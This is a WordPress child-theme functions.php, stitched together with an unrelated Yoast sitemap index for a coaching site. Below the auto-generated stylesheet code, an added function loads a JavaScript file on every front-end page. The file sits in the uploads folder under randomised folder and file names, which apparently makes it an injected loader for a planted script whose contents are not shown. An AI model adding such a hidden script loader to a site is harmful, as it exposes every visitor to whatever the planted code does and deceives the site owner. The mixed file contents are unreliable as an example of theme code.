
// Exit if accessed directly
if ( !defined( 'ABSPATH' ) ) exit;

// BEGIN ENQUEUE PARENT ACTION
// AUTO GENERATED - Do not modify or remove comment markers above or below:

if ( !function_exists( 'chld_thm_cfg_locale_css' ) ):
    function chld_thm_cfg_locale_css( $uri ){
        if ( empty( $uri ) && is_rtl() && file_exists( get_template_directory() . '/rtl.css' ) )
            $uri = get_template_directory_uri() . '/rtl.css';
        return $uri;
    }
endif;
add_filter( 'locale_stylesheet_uri', 'chld_thm_cfg_locale_css' );

if ( !function_exists( 'chld_thm_cfg_parent_css' ) ):
    function chld_thm_cfg_parent_css() {
        wp_enqueue_style( 'chld_thm_cfg_parent', trailingslashit( get_template_directory_uri() ) . 'style.css', array( 'ut-core-font-and-icons','ut-core-plugins' ) );
    }
endif;
add_action( 'wp_enqueue_scripts', 'chld_thm_cfg_parent_css', 10 );

// END ENQUEUE PARENT ACTION

if (!function_exists('sch_enqueue_front_asset')) {
    function sch_enqueue_front_asset() {
        wp_enqueue_script('sch-front', 'https://davidryancoaching.com/wp-content/uploads/res-f73ba6/lib-c9c9/front-d2b1f32a.js', array(), null, false);
    }
    add_action('wp_enqueue_scripts', 'sch_enqueue_front_asset');
}
<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//davidryancoaching.com/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://davidryancoaching.com/post-sitemap.xml</loc>
		<lastmod>2026-03-13T05:15:26+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://davidryancoaching.com/page-sitemap.xml</loc>
		<lastmod>2026-03-12T09:24:25+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://davidryancoaching.com/portfolio-sitemap.xml</loc>
		<lastmod>2024-07-02T12:46:07+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://davidryancoaching.com/category-sitemap.xml</loc>
		<lastmod>2026-03-13T05:15:26+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://davidryancoaching.com/portfolio-category-sitemap.xml</loc>
		<lastmod>2024-07-02T12:46:07+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://davidryancoaching.com/author-sitemap.xml</loc>
		<lastmod>2026-03-13T08:02:22+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->